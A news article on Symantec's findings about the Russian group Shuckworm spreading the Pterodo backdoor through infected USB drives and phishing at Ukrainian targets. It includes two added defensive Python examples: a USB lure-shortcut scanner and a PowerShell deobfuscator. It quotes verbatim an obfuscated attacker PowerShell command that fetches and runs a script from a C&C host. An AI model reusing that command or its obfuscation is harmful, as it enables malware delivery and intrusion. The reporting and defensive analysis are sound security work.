
Russia-backed hackers unleash new USB-based malware on Ukraine’s military



Hackers working for Russia’s Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.

“The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information,” researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. “There were indications in some organizations that the attackers were on the machines of the organizations’ human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.”

The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russia’s FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne said the hacking group had “attacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.”

In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining sensitive military information that could be abused in Russia’s ongoing invasion.

This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine and creates a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and evidence.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they will install Pterodo on their machines.

The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are intentionally not connected to the Internet in an attempt to prevent them from being hacked.
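The disguise described above, a document-like extension in front of .lnk, is something a responder can check for on any removable drive before it is used. The following is an added example (not Symantec's or the article's code) that walks a directory tree, flags .lnk files with a double extension, and names the lure file names quoted in the article; the sample drive it builds is constructed test data.

```python
import os
import tempfile

# Lure names quoted in the article; any document-like *.lnk is flagged as well.
KNOWN_LURES = {"video_porn.rtf.lnk", "do_not_delete.rtf.lnk"}
DOC_LIKE = {".rtf", ".doc", ".docx", ".pdf", ".txt", ".xls", ".xlsx"}


def suspicious_shortcuts(root):
    """Return (path, reason) for every .lnk under root whose name carries a
    document-like second extension, which is how the script disguises itself."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if not lower.endswith(".lnk"):
                continue
            inner_ext = os.path.splitext(lower[:-4])[1]   # strip .lnk, look again
            if lower in KNOWN_LURES:
                hits.append((os.path.join(dirpath, name), "known lure name"))
            elif inner_ext in DOC_LIKE:
                hits.append((os.path.join(dirpath, name),
                             "double extension %s.lnk" % inner_ext))
    return hits


def flagged_names(root):
    """Sorted file names of the flagged shortcuts, convenient for reporting."""
    return sorted(os.path.basename(p) for p, _ in suspicious_shortcuts(root))


def build_sample_drive():
    """Constructed stand-in for a mounted removable drive (sample data only):
    two disguised shortcuts next to benign files, including a normal .lnk."""
    root = tempfile.mkdtemp(prefix="usb_")
    for name in ["video_porn.rtf.lnk", "report.docx.lnk", "notes.txt",
                 "Tools.lnk", "budget.xlsx"]:
        with open(os.path.join(root, name), "wb") as f:
            f.write(b"\x00")   # contents are irrelevant to the name check
    return root


if __name__ == "__main__":
    for path, reason in suspicious_shortcuts(build_sample_drive()):
        print(reason, "->", path)
```

Point the scanner at a mounted drive's root in place of the sample directory; a plain shortcut such as Tools.lnk is left alone, so the output is short enough to review by hand.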

To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.

Shuckworm typically uses phishing emails as an initial vector into targets’ computers. The emails contain malicious attachments that masquerade as files with extensions including .docx, .rar, .sfx, lnk, and hta. Emails typically use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.

Symantec researchers said that an infected computer they recovered in the campaign was typical of the way it works. They wrote:

In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.

After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:

"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"

More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.

Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to evade detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
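The command quoted above hides its C&C host and URI path by building them from [char](n+m) arithmetic and string concatenation, the kind of obfuscation the post says keeps changing. The following is an added example (not Symantec's or the article's code) of a small analyst-side decoder for that pattern: it folds single-quoted literals, [char]() calls and references to earlier variables, and reports anything else (the DNS lookup, the WebClient call, the final iex) as unresolved instead of guessing; the input is the inner script of the quoted command, used here as constructed analysis input.

```python
import re

# Constructed input: the obfuscated PowerShell one-liner quoted in the article
# (inner script only, without the cmd.exe wrapper), used here as analysis input.
SAMPLE = (
    "$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);"
    "[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};"
    "$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);"
    "$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];"
    "$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;"
    "$text=$client.downloadstring($faddr);iex $text"
)

# One token of a string-building expression: a single-quoted literal,
# a [char](n+m) call, or a reference to a variable assigned earlier.
TOKEN_RE = re.compile(r"'([^']*)'|\[char\]\(([0-9+ ]+)\)|\$(\w+)", re.IGNORECASE)
ASSIGN_RE = re.compile(r"^\$(\w+)\s*(\+?=)\s*(.+)$", re.DOTALL)


def eval_concat(rhs, variables):
    """Fold a '+'-joined expression into a string; None if any part is not a
    literal, a [char]() call, or an already-known variable."""
    if TOKEN_RE.sub("", rhs).replace("+", "").strip():
        return None                      # method call, indexing, new-object ...
    pieces = []
    for literal, charexpr, varname in TOKEN_RE.findall(rhs):
        if charexpr:                     # [char](56+56) -> chr(112) -> 'p'
            pieces.append(chr(sum(int(t) for t in charexpr.split("+"))))
        elif varname:
            if varname not in variables:
                return None              # e.g. $addr comes from a DNS lookup
            pieces.append(variables[varname])
        else:
            pieces.append(literal)
    return "".join(pieces)


def deobfuscate(script):
    """Walk ';'-separated statements, applying '=' and '+=' to string
    variables; anything else is listed as unresolved rather than guessed."""
    variables, unresolved = {}, []
    for stmt in (s.strip() for s in script.split(";")):
        m = ASSIGN_RE.match(stmt)
        value = eval_concat(m.group(3), variables) if m else None
        if value is None:
            unresolved.append(stmt)
            continue
        name, op = m.group(1), m.group(2)
        variables[name] = variables.get(name, "") + value if op == "+=" else value
    return variables, unresolved
```

Running deobfuscate(SAMPLE) yields the plain host and path in the returned dictionary, which can go straight into a blocklist or a DNS log search, while the unresolved list shows which statements still need a look by hand.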

Thursday’s post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they’ve been targeted. The post also warns that the group poses a threat that targets should take seriously.

“This activity demonstrates that Shuckworm’s relentless focus on Ukraine continues,” they wrote. “It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations.”
